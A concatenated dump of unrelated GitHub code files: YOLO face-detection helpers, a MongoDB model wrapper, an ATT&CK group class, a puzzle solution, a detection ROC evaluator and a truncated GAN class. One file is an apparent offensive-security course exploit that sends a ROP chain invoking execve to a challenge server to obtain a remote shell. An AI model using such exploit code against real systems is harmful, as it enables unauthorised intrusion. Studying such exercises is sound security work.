letterbox(img, new_shape=640, color=(114, 114, 114), auto=True, scaleup=True):\n # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232\n shape = img.shape[:2] # current shape [height, width]\n\n # Scale ratio (new / old)\n r = min(new_shape / shape[0], new_shape / shape[1])\n if not scaleup: # only scale down, do not scale up (for better test mAP)\n r = min(r, 1.0)\n\n # Compute padding\n new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))\n dw, dh = new_shape - new_unpad[0], new_shape - new_unpad[1] # wh padding\n if auto: # minimum rectangle\n dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding\n\n dw /= 2 # divide padding into 2 sides\n dh /= 2\n\n if shape[::-1] != new_unpad: # resize\n img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)\n top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))\n left, right = int(round(dw - 0.1)), int(round(dw + 0.1))\n img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border\n return img\n\ndef make_grid(nx=20, ny=20):\n yv, xv = torch.meshgrid([torch.arange(ny), torch.arange(nx)])\n grid_stack = torch.stack((xv, yv), 2)\n grid_stack = grid_stack.view((1, 1, ny, nx, 2)).float()\n return grid_stack\n\ndef YoloFaceOutputProcess(outs, face_config, not_yaml=True, yaml_ancors=[]):\n strides = face_config.strides\n na = face_config.nanchors\n no = face_config.classes + 5 + 10\n fmNum = len(outs)\n anchors = []\n if not_yaml:\n anchors = face_config.face_anchors4\n else:\n anchors = yaml_ancors\n anchors = torch.tensor(np.array(anchors, dtype=np.float32)).view(fmNum, -1, 2)\n anchor_grid = anchors.clone().view(fmNum, 1, -1, 1, 1, 2)\n\n pouts = []\n for i in range(fmNum):\n pre_out = outs[i]\n devi = pre_out.device\n\n if not_yaml:\n nbatch, nchannel, nh, nw = pre_out.shape\n pre_out = pre_out.view(nbatch, na, no, nh, nw)\n pre_out = pre_out.permute(0, 1, 3, 4, 2).contiguous() # b 3 40 40 16\n # pre_out: xywh, conf(iou), landms, classid\n nbatch, na, nh, nw, no = pre_out.shape\n fp_grid = make_grid(nx=nw, ny=nh).to(devi)\n\n y = torch.full_like(pre_out, 0)\n y[..., [0, 1, 2, 3, 4, 15]] = pre_out[..., [0, 1, 2, 3, 4, 15]].sigmoid()\n y[..., 5:15] = pre_out[..., 5:15]\n\n y[..., 0:2] = (y[..., 0:2] * 2. 
- 0.5 + fp_grid) * strides[i] # xy\n y[..., 2:4] = (y[..., 2:4] * 2) ** 2 * anchor_grid[i] # wh\n\n y[..., 5:7] = y[..., 5:7] * anchor_grid[i] + fp_grid * strides[i] # landmark x1 y1\n y[..., 7:9] = y[..., 7:9] * anchor_grid[i] + fp_grid * strides[i] # landmark x2 y2\n y[..., 9:11] = y[..., 9:11] * anchor_grid[i] + fp_grid * strides[i] # landmark x3 y3\n y[..., 11:13] = y[..., 11:13] * anchor_grid[i] + fp_grid * strides[i] # landmark x4 y4\n y[..., 13:15] = y[..., 13:15] * anchor_grid[i] + fp_grid * strides[i] # landmark x5 y5\n\n pouts.append(y.view(nbatch, -1, no))\n\n z = torch.cat(pouts, 1)\n return z\n\ndef YoloFaceNMS(prediction, conf_thres=0.25, iou_thres=0.45):\n nc = prediction.shape[2] - 15 # number of classes\n xc = prediction[..., 4] > conf_thres # candidates\n\n # Settings\n min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height\n time_limit = 10.0 # seconds to quit after\n redundant = True # require redundant detections\n multi_label = nc > 1 # multiple labels per box (adds 0.5ms/img)\n merge = False # use merge-NMS\n t = time.time()\n output = [torch.zeros((0, 16), device=prediction.device)] * prediction.shape[0]\n\n for xi, x in enumerate(prediction):\n x = x[xc[xi]]\n # If none remain process next image\n if not x.shape[0]:\n continue\n\n # Compute conf\n x[:, 15:] *= x[:, 4:5] # conf = obj_conf * cls_conf\n # Box (center x, center y, width, height) to (x1, y1, x2, y2)\n box = xywh2xyxy(x[:, :4])\n\n # Detections matrix nx6 (xyxy, conf, landmarks, cls)\n if multi_label:\n i, j = (x[:, 15:] > conf_thres).nonzero(as_tuple=False).T\n x = torch.cat((box[i], x[i, j + 15, None], x[:, 5:15], j[:, None].float()), 1)\n else: # best class only\n conf, j = x[:, 15:].max(1, keepdim=True)\n x = torch.cat((box, conf, x[:, 5:15], j.float()), 1)[conf.view(-1) > conf_thres]\n\n # If none remain process next image\n n = x.shape[0] # number of boxes\n if not n:\n continue\n\n # Batched NMS\n c = x[:, 15:16] * max_wh # classes\n boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores\n i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS\n if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)\n # update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)\n iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix\n weights = iou * scores[None] # box weights\n x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes\n if redundant:\n i = i[iou.sum(1) > 1] # require redundancy\n\n output[xi] = x[i]\n if (time.time() - t) > time_limit:\n break # time limit exceeded\n return output\n\ndef scale_coords_boxes(img1_shape, coords, img0_shape, ratio_pad=None):\n # Rescale coords (xyxy) from img1_shape to img0_shape\n if ratio_pad is None: # calculate from img0_shape\n gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new\n pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding\n else:\n gain = ratio_pad[0][0]\n pad = ratio_pad[1]\n\n coords[:, [0, 2]] -= pad[0] # x padding\n coords[:, [1, 3]] -= pad[1] # y padding\n coords[:, :4] /= gain\n clip_coords(coords, img0_shape)\n return coords\n\ndef scale_coords_landmarks(img1_shape, coords, img0_shape, ratio_pad=None):\n # Rescale coords (xyxy) from img1_shape to img0_shape\n if ratio_pad is None: # calculate from img0_shape\n gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new\n pad = (img1_shape[1] - img0_shape[1] * gain) / 2, 
(img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding\n else:\n gain = ratio_pad[0][0]\n pad = ratio_pad[1]\n\n coords[:, [0, 2, 4, 6, 8]] -= pad[0] # x padding\n coords[:, [1, 3, 5, 7, 9]] -= pad[1] # y padding\n coords[:, :10] /= gain\n coords[:, 0].clamp_(0, img0_shape[1]) # x1\n coords[:, 1].clamp_(0, img0_shape[0]) # y1\n coords[:, 2].clamp_(0, img0_shape[1]) # x2\n coords[:, 3].clamp_(0, img0_shape[0]) # y2\n coords[:, 4].clamp_(0, img0_shape[1]) # x3\n coords[:, 5].clamp_(0, img0_shape[0]) # y3\n coords[:, 6].clamp_(0, img0_shape[1]) # x4\n coords[:, 7].clamp_(0, img0_shape[0]) # y4\n coords[:, 8].clamp_(0, img0_shape[1]) # x5\n coords[:, 9].clamp_(0, img0_shape[0]) # y5\n return coords\n\ndef clip_coords(boxes, img_shape):\n # Clip bounding xyxy bounding boxes to image shape (height, width)\n boxes[:, 0].clamp_(0, img_shape[1]) # x1\n boxes[:, 1].clamp_(0, img_shape[0]) # y1\n boxes[:, 2].clamp_(0, img_shape[1]) # x2\n boxes[:, 3].clamp_(0, img_shape[0]) # y2\n\ndef box_iou(box1, box2):\n # https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py\n \"\"\"\n Return intersection-over-union (Jaccard index) of boxes.\n Both sets of boxes are expected to be in (x1, y1, x2, y2) format.\n Arguments:\n box1 (Tensor[N, 4])\n box2 (Tensor[M, 4])\n Returns:\n iou (Tensor[N, M]): the NxM matrix containing the pairwise\n IoU values for every element in boxes1 and boxes2\n \"\"\"\n\n def box_area(box):\n # box = 4xn\n return (box[2] - box[0]) * (box[3] - box[1])\n\n area1 = box_area(box1.T)\n area2 = box_area(box2.T)\n\n # inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)\n inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) -\n torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)\n # iou = inter / (area1 + area2 - inter)\n return inter / (area1[:, None] + area2 - inter)\n\ndef bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-9):\n # Returns the IoU of box1 to box2. 
box1 is 4, box2 is nx4\n box2 = box2.T\n\n # Get the coordinates of bounding boxes\n if x1y1x2y2: # x1, y1, x2, y2 = box1\n b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]\n b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]\n else: # transform from xywh to xyxy\n b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2\n b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2\n b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2\n b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2\n\n # Intersection area\n inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \\\n (torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)\n\n # Union Area\n w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps\n w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps\n union = w1 * h1 + w2 * h2 - inter + eps\n\n iou = inter / union\n if GIoU or DIoU or CIoU:\n # convex (smallest enclosing box) width\n cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1)\n ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height\n if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1\n c2 = cw ** 2 + ch ** 2 + eps # convex diagonal squared\n rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 +\n (b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 # center distance squared\n if DIoU:\n return iou - rho2 / c2 # DIoU\n elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47\n v = (4 / math.pi ** 2) * \\\n torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)\n with torch.no_grad():\n alpha = v / ((1 + eps) - iou + v)\n return iou - (rho2 / c2 + v * alpha) # CIoU\n else: # GIoU https://arxiv.org/pdf/1902.09630.pdf\n c_area = cw * ch + eps # convex area\n return iou - (c_area - union) / c_area # GIoU\n else:\n return iou # IoU","repo_name":"xinyunmian/face-detection","sub_path":"yolo_face/FaceUtils.py","file_name":"FaceUtils.py","file_ext":"py","file_size_in_byte":11508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74839677927","text":"from struct import pack\n\nfrom pwn import *\n\n\n\nusername = 'aa6243'\n\nbinary_name = './inspector'\n\n\n\n#is_local = True\n\n#is_local_dbg= True\n\nremote_host = 'offsec-chalbroker.osiris.cyber.nyu.edu'\n\nremote_port = 1342\n\n\n\ngdb_script = '''set follow-fork-mode parent\n\nb *0x00400678\n\ncontinue\n\n'''\n\n\n\nshell_cmd = 'whoami'\n\n\n\n#symbol 'cheating'\n\ngadget_1 = 0x00400625\n\ngadget_2 = 0x0040062E\n\ngadget_3 = 0x00400636\n\ngadget_4 = 0x0040063E\n\ngadget_5 = 0x00400646\n\naddr = 0x00400708\n\n\n\nnop = asm('nop', arch=\"amd64\")\n\n\n\ndef gen_payload():\n\n \n payload = nop*40 + p64(gadget_2) + p64(addr) + p64(gadget_3) + p64(0x00000000) + p64(gadget_4) + p64(0x00000000) + p64(gadget_5) + p64(0x0000003b) + p64(gadget_1)\n\n\n return payload\n\n \n\n\n\ndef get_target():\n\n \n\n target = remote(remote_host, remote_port)\n\n target.sendline(username)\n\n return target\n\n\n\n\n\ndef main():\n\n target = get_target()\n\n preamble = target.recvuntil('Please pop a shell!')\n\n #get the shell\n\n target.sendline(gen_payload())\n\n #use the shell\n\n target.sendline(shell_cmd)\n\n #get output\n\n print('shell output: %s' % target.recvline())\n\n #interactive for fun\n\n target.interactive()\n\n\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"adeenayub/Intro-to-Offensive-Security","sub_path":"Week 
9/Inspector/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5048563729","text":"import datetime\nimport logging\n\nimport pymongo\nfrom bson.objectid import ObjectId\nfrom pymongo import ReturnDocument\nfrom typing import Any\nfrom pymongo.errors import DuplicateKeyError\nfrom common.singleton import Singleton\nfrom database.mongo_connector import mongo_connector\n\n__logger__ = logging.getLogger()\n\nTIME_FIELDS = [\n 'last_received',\n 'created_time',\n 'updated_time',\n 'time_received'\n]\n\n\nclass MongoBaseModel(object, metaclass=Singleton):\n db: Any = None\n collection: Any = None\n\n def __init__(self, db, collection):\n self.db = mongo_connector.get_client()[db]\n self.collection = self.db[collection]\n\n def convert_fields(self, item):\n try:\n _id = item.pop('_id', None)\n if _id is not None:\n item['id'] = str(_id)\n\n for time_field in TIME_FIELDS:\n if time_field in item:\n item[time_field] = int(item[time_field].replace(\n tzinfo=datetime.timezone.utc).timestamp())\n except:\n pass\n\n return item\n\n async def create(self, item):\n try:\n time = datetime.datetime.utcnow()\n item['created_time'] = time\n item['updated_time'] = time\n\n return_item = await self.collection.insert_one(item)\n print(\"Return item: \", return_item)\n return_id = str(return_item.inserted_id)\n if return_id:\n item = self.convert_fields(item)\n return item\n else:\n return None\n except DuplicateKeyError as e:\n raise e\n except Exception as e:\n __logger__.error(f'create object failed: {e}')\n return None\n\n async def find_one_and_update(self, filter, update_body):\n try:\n item = await self.collection.find_one_and_update(\n filter,\n {\n \"$currentDate\": {\"updated_time\": True},\n '$set': update_body\n },\n return_document=ReturnDocument.AFTER)\n if item:\n item = self.convert_fields(item)\n return item\n except Exception as e:\n __logger__.error(f'find_and_update object failed: {e}')\n return None\n\n async def find_one(self, filter, exclude_fields=None):\n try:\n _id = filter.pop('_id', None) or filter.pop('id', None)\n if _id and isinstance(_id, str):\n filter['_id'] = ObjectId(_id)\n\n items = await self.get_list(\n filter=filter,\n size=1,\n exclude_fields=exclude_fields\n )\n print(\"Items find one: \", items)\n if items and len(items) > 0:\n return self.convert_fields(items[0])\n\n return None\n except Exception as e:\n __logger__.error(f'find object failed: {e}')\n return None\n\n async def get_list(\n self,\n filter,\n from_id=None,\n size=0,\n skip=0,\n order=[('_id', pymongo.DESCENDING)],\n order_type=None,\n collation=False,\n exclude_fields=[]\n ):\n try:\n conditions = filter\n if not conditions:\n conditions = {}\n exclude_filter = {}\n if exclude_fields:\n exclude_filter = dict((field, 0) for field in exclude_fields)\n if from_id:\n if order_type is None:\n conditions[\"_id\"] = {\"$lt\": ObjectId(from_id)}\n elif order_type == 1:\n conditions[\"_id\"] = {\"$gt\": ObjectId(from_id)}\n elif order_type == -1:\n conditions[\"_id\"] = {\"$lt\": ObjectId(from_id)}\n __logger__.debug(f'filter = + {str(conditions)}')\n if collation:\n cursor = self.collection.find(filter=conditions, projection=exclude_filter, limit=size, skip=skip).sort(order) \\\n .collation({'locale': 'en'})\n else:\n cursor = self.collection.find(\n filter=conditions, projection=exclude_filter, limit=size, skip=skip).sort(order)\n items = []\n for item in await 
cursor.to_list(length=100):\n item = self.convert_fields(item)\n items.append(item)\n # logger.debug(items)\n return items\n except Exception as e:\n __logger__.error(f'get_list object failed: {e}')\n return None\n\n async def count(self, filter):\n try:\n count = await self.collection.count(filter=filter)\n return count\n except Exception as e:\n __logger__.error(e)\n return None\n\n async def delete_many(self, filter):\n try:\n result = await self.collection.delete_many(filter)\n return result.deleted_count\n except Exception as e:\n __logger__.error(f'delete_many object failed: {e}')\n return None\n","repo_name":"phandc/auto-etl","sub_path":"api-management/model/basemodel.py","file_name":"basemodel.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24344818740","text":"class Group:\n\tID = \"\"\n\tdisplaytitle = \"\"\n\tdescription = \"\"\n\tfullurl = \"\"\n\taliases = []\n\n\tdef __init__(self, ID, displaytitle, description, fullurl, aliases, techniques, software):\n\t\tself.ID = ID\n\t\tself.displaytitle = displaytitle\n\t\tself.description = description\n\t\tself.fullurl = fullurl\n\t\tself.aliases = aliases\n\t\tself.techniques = {}\n\t\tself.software = {}\n\t\tfor tech in techniques:\n\t\t\tself.techniques[tech['fulltext'].split('/')[1]] = tech\n\t\tfor item in software:\n\t\t\tself.software[item['fulltext'].split('/')[1]] = item\n\n\tdef __str__(self):\n\t\treturn \"{}: {}\".format(self.ID, self.displaytitle)\n\n\tdef __repr__(self):\n\t\treturn \"{}: {}\".format(self.ID, self.displaytitle)\n\n\tdef search(self,query):\n\t\tpass","repo_name":"MalwareSoup/MitreAttack","sub_path":"MitreAttack/Group.py","file_name":"Group.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"53"} +{"seq_id":"40727653178","text":"import sys\n\nf = open(sys.argv[1], 'r', encoding = \"utf-16\")\nfile = f.read().splitlines()\n\nthis = 0\nelfs = []\nfor line in file:\n\tline = line.strip()\n\tif not line:\n\t\telfs.append(this)\n\t\tthis = 0\n\telse:\n\t\tthis = this + int(line)\nelfs.sort()\nprint(\"part1: \" + str(elfs[-1]))\nprint(\"part2: \" + str(sum(elfs[-3:])))\n","repo_name":"rpehkone/adventofcode","sub_path":"2022/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73277344169","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# from Evaluation.read_bb_files import read_box_MIDV2020_gt_templates\n# from Evaluation.read_bb_files import read_box_MIDV2020_pred_templates\n# from Evaluation.read_bb_files import read_box_MIDV2020_gt\n# from Evaluation.read_bb_files import read_box_MIDV2020_pred\nfrom read_bb_files import read_box_MIDV2020_gt_clips\nfrom read_bb_files import read_box_MIDV2020_pred_clips\nfrom box_iou import box_iou\n# from Evaluation.box_iou import label_pre_bboxes\n# from shutil import copyfile\n# from scipy import interpolate\n#type_dir = \"templates_det\"\n#type_dir = \"shift_scan_det\"\n#type_dir = \"photo_det\"\ntype_dir = \"clips_det\"\nmiss_annotation_file = \"/data/zming/datasets/MIDV2020/MIDV_det_final/clips/miss_annotation_file.txt\"\nfolder = '/data/zming/datasets/MIDV2020/%s/evaluation'%type_dir\nfolder_gt = '/data/zming/datasets/MIDV2020/MIDV_det_final/clips_bbox/annotations/'\n#folder_pred = 
'/data/zming/datasets/MIDV2020/%s/images/'%type_dir\nfolder_pred = '/data/zming/datasets/MIDV2020/MIDV_det_final/%s/images/'%type_dir\n\n#file_path = 'evaluate_pcn_MIDV_v5_calibrate.txt'\nfile_path = 'evaluate_mtcnn_MIDV_v5_calibrate.txt'\n#file_path = 'MIDV-500-outList_cascade_v6_calibrate.txt'\n\n#result='/data/zming/logs/CBDAR/'\nresult = '/data/zming/datasets/MIDV2020/%s/evaluation'%type_dir\n\nIOU_THRESHOLD = 0.7\ndef calcu_roc(gt_bboxes, pre_bboxes_confidence, pre_bboxes_label, gt_recall_bboxes_idx, pre_iou_images):\n scale_roc = 1000\n #scale_roc = 100\n TP = np.zeros(scale_roc)\n FP = np.zeros(scale_roc)\n PRECI = np.zeros(scale_roc)\n TPR = np.zeros(scale_roc)\n P = np.zeros(scale_roc)\n tp_images = []\n fp_images = []\n\n nrof_gt = 0\n for gt_bb in gt_bboxes:\n nrof_gt += len(gt_bb)\n GT = nrof_gt\n\n confi_scale = np.arange(0,1,1.0/scale_roc)\n confi_scale = confi_scale[::-1]\n\n # ## sort the pre_bboxes_iou according to the confidence\n # idx_sort = np.argsort(np.array(pre_bboxes_confidence))\n # pre_bboxes_confidence_sort = pre_bboxes_confidence(idx_sort)\n # pre_bboxes_label_sort = np.array(pre_bboxes_label)(idx_sort)\n # nrof_pre_bboxes = len(pre_bboxes_label_sort)\n\n\n for i, confi in enumerate(confi_scale):\n print(\"Evaluation: %f [%d/%d]\"%(confi, i, scale_roc))\n predict_bb_confi = np.greater(pre_bboxes_confidence, confi)\n nrof_predict_bb_confi = np.sum(predict_bb_confi) ## positive bbox, i.e. confidence > threshold\n\n predict_bb_label = np.equal(pre_bboxes_label, 1)\n predict_bb = np.logical_and(predict_bb_confi, predict_bb_label)\n\n idx = range(len(predict_bb_label))\n idx_predic_bb = np.array(idx)[predict_bb]\n\n gt_recall_bboxes = np.array(gt_recall_bboxes_idx)[idx_predic_bb]\n gt_recall_bboxes_set = set (tuple(x) for x in gt_recall_bboxes)\n tp = len(gt_recall_bboxes_set) ## true positive bbox\n\n # ########### Find the tp images and fp images #########################\n # pre_iou_images_confi = np.array(pre_iou_images)[predict_bb_confi]\n # pre_iou_images_almost_tp = np.array(pre_iou_images)[predict_bb]\n # gt_recall_bboxes_set_idx = []\n # for x in gt_recall_bboxes_set:\n # notfind = True\n # j = 0\n # while(notfind):\n # xx = gt_recall_bboxes_idx[i]\n # if (np.array(x) == xx).all():\n # gt_recall_bboxes_set_idx.append(i)\n # notfind = False\n # j += 1\n # tp_images = np.array(pre_iou_images)[gt_recall_bboxes_set_idx]\n # fp_images = np.array(pre_iou_images)[predict_bb_confi]\n # fp_images = [x for x in fp_images if not x in tp_images]\n # tp_images.sort()\n # fp_images.sort()\n\n # save_tp_images_path = os.path.join(result, 'tp_images')\n # if not os.path.exists(save_tp_images_path):\n # os.mkdir(save_tp_images_path)\n # for img in tp_images:\n # # img = img.replace('/','_')\n # # copyfile(os.path.join(folder, file_path[:-4], img), os.path.join(save_tp_images_path, img))\n # img_name = str.split(img, '/')[-1]\n # copyfile(img, os.path.join(save_tp_images_path, img_name))\n #\n # save_fp_images_path = os.path.join(result, 'fp_images')\n # if not os.path.exists(save_fp_images_path):\n # os.mkdir(save_fp_images_path)\n # for img in fp_images:\n # # img = img.replace('/','_')\n # #copyfile(os.path.join(folder, file_path[:-4], img), os.path.join(save_fp_images_path, img))\n # img_name = str.split(img, '/')[-1]\n # copyfile(img, os.path.join(save_fp_images_path, img_name))\n\n ##############################################################################\n\n p = nrof_predict_bb_confi\n fp = p - tp\n if p == 0:\n pr = 1.0\n else:\n pr = float(tp)/p\n tpr = 
float(tp)/GT\n\n TP[i] = tp\n FP[i] = fp\n PRECI[i] = pr\n TPR[i] = tpr\n P[i] = p\n\n AP = np.mean(PRECI)\n\n\n\n\n return TP, FP, TPR, PRECI, P, AP, tp_images, fp_images\n\n\ndef main():\n if not os.path.isdir(result):\n os.mkdir(result)\n result_path = os.path.join(result, \"iou_%.1f\"%IOU_THRESHOLD)\n if not os.path.isdir(result_path):\n os.mkdir(result_path)\n gt_bb_principal = read_box_MIDV2020_gt_clips(folder_gt)\n pred_bb_principal, pre_bb_images =read_box_MIDV2020_pred_clips(folder_pred, miss_annotation_file)\n #pred_bb_principal, pre_bb_images =read_box_MIDV2020_pred_templates(folder_pred)\n #pre_bboxes_iou, pre_bboxes_confidence, pre_bboxes_label, gt_recall_bboxes_idx, pre_iou_images = box_iou(gt_bb_all, pre_bb, pre_bb_images)\n pre_bboxes_iou, pre_bboxes_confidence, pre_bboxes_label, gt_recall_bboxes_idx, pre_iou_images = box_iou(gt_bb_principal, pred_bb_principal, pre_bb_images, IOU_THRESHOLD)\n\n # nrof_gt_bb = len(gt_bb_all)\n # TP, FP, TPR, PRECI, P, _, _ = calcu_roc(gt_bb_all, pre_bboxes_confidence, pre_bboxes_label, gt_recall_bboxes_idx, pre_iou_images)\n nrof_gt_bb = len(gt_bb_principal)\n TP, FP, TPR, PRECI, P, AP, _, _ = calcu_roc(gt_bb_principal, pre_bboxes_confidence, pre_bboxes_label, gt_recall_bboxes_idx, pre_iou_images)\n with open(os.path.join(result_path, 'ROC_PR_%s.txt'%file_path[:-4]), 'w') as f:\n f.write('AP@IoU: %f@%f\\n'%(AP, IOU_THRESHOLD))\n f.write('TP FP P TPR PRECI\\n')\n for i in range(len(TP)):\n f.write('%d %d %d %f %f \\n'%(TP[i],FP[i], P[i], TPR[i],PRECI[i]))\n\n ## plot ROC\n # f = interpolate.interp1d(FP, TPR)\n # FP_new = np.linspace(0,max(FP),1001)\n # TPR_new = f(FP_new)\n fig = plt.figure()\n plt.plot(FP, TPR)\n plt.xlabel('False Positive')\n plt.ylabel('True Positive Rate/Recall')\n plt.legend(loc='lower right')\n #plt.show()\n fig.savefig(os.path.join(result_path, 'ROC_%s.png'%file_path[:-4]))\n\n ## plot PR\n for i in range(len(PRECI)):\n PRECI[i] = max(PRECI[i:])\n # f = interpolate.interp1d(TPR, PRECI)\n # TPR_new = np.linspace(0,1,1001)\n # PRECI_new = f(TPR_new)\n fig = plt.figure()\n plt.plot(TPR, PRECI)\n plt.xlabel('True Positive Rate/Recall')\n plt.ylabel('Precision')\n plt.legend(loc='lower right')\n #plt.show()\n fig.savefig(os.path.join(result_path, 'P-R_%s.png'%file_path[:-4]))\n\n\n\n\n\n\n\n\n\n\n\nif __name__== '__main__':\n main()\n\n","repo_name":"hengxyz/MIDV_2020_det","sub_path":"Evaluation/Evaluate_ROC.py","file_name":"Evaluate_ROC.py","file_ext":"py","file_size_in_byte":7400,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"72565550247","text":"import torch as t\nimport torch.nn as nn\nimport torch.utils.data as d_utils\nimport torchvision.utils as tv_utils\nfrom ..Utilities import utilities as u\nfrom torch.autograd import Variable as V\n\n\nclass MLPGAN(object):\n def __init__(self, image_size, n_z, n_chan, hiddens, depths, ngpu, loss='BCE'):\n \"\"\"\n MLPGAN object. 
This class is a wrapper of a generalized MLPGAN.\n Instance of this class initializes the Generator and the Discriminator.\n Arguments:\n image_size = Height / width of the real images\n n_z = Dimensionality of the latent space\n n_chan = Number of channels of the real images\n hiddens = Number of nodes in the hidden layers of the generator and discriminator\n Format:\n hiddens = {'gen': n_gen_hidden,\n 'dis': n_dis_hidden}\n depths = Number of fully connected layers in the generator and discriminator\n Format:\n depths = {'gen': n_gen_depth,\n 'dis': n_dis_depth}\n ngpu = Number of gpus to allocated, if to be run on gpu\n loss (opt) = The loss function to be used. Default is BCE loss\n \"\"\"\n super(MLPGAN, self).__init__()\n self.Gen_net = Generator(image_size, n_z, n_chan, hiddens['gen'], depths['gen'], ngpu)\n self.Dis_net = Discriminator(image_size, n_chan, hiddens['dis'], depths['dis'], ngpu)\n self.ngpu = ngpu\n self.n_z = n_z\n self.image_size = image_size\n self.n_chan = n_chan\n if loss == 'BCE':\n self.loss = nn.BCELoss()\n elif loss == 'MSE':\n self.loss = nn.MSELoss()\n\n def train(self, dataset, batch_size, n_iters, optimizer_details, show_period=50,\n display_images=True, misc_options=['init_scheme', 'save_model']):\n \"\"\"\n Train function of the MLPGAN class. This starts training the model.\n Arguments:\n dataset = torch.utils.data.Dataset instance\n batch_size = batch size to be used throughout the training\n n_iters = Number of generator iterations to run the training for\n optimizer_details = Dictionary representing the details for optimizers for generator and discriminator\n Format:\n optimizer_details = {'gen':\n {'name' : Name of optimizer,\n 'learn_rate' : learning rate,\n 'betas' : (beta_1, beta_2), => Optional, if using Adam/Adamax\n 'momentum' : momentum, => Optional, if using momentum SGD/NAG\n 'nesterov' : True/False, => Optional, if using NAG},\n 'dis':\n }\n show_period (opt) = Prints the errors with current iteration number every show_period iterations\n display_images (opt) = If true, saves the real, reconstructed and generated images\n from noise every show_period*5 iterations\n misc_options (opt) = List of strings.\n - Add 'init_scheme' to the list, if you want to implement\n specific initialization schemes\n - Add 'save_model' to the list, if you want to save the model\n after n_iters iterations of training\n \"\"\"\n optimizer_details['gen']['params'] = self.Gen_net.parameters()\n optimizer_details['dis']['params'] = self.Dis_net.parameters()\n G_optmzr = u.get_optimizer_with_params(optimizer_details['gen'])\n D_optmzr = u.get_optimizer_with_params(optimizer_details['dis'])\n\n inpt = t.FloatTensor(batch_size, self.n_chan, self.image_size, self.image_size)\n noise = t.FloatTensor(batch_size, self.n_z, 1, 1)\n label = t.FloatTensor(batch_size)\n if display_images:\n fixed_noise = t.randn(batch_size, self.n_z, 1, 1)\n\n if 'init_scheme' in misc_options:\n self.Gen_net.apply(u.weight_init_scheme)\n self.Dis_net.apply(u.weight_init_scheme)\n\n if self.ngpu > 0:\n inpt = inpt.cuda()\n noise = noise.cuda()\n label = label.cuda()\n if display_images:\n fixed_noise = fixed_noise.cuda()\n\n self.Gen_net = self.Gen_net.cuda()\n self.Dis_net = self.Dis_net.cuda()\n\n d_loader = d_utils.DataLoader(dataset, batch_size, shuffle=True)\n\n # Train loop\n # Details to be followed:\n # 1. Train the discriminator first. Train the discriminator with reals and then with fakes\n # 2. 
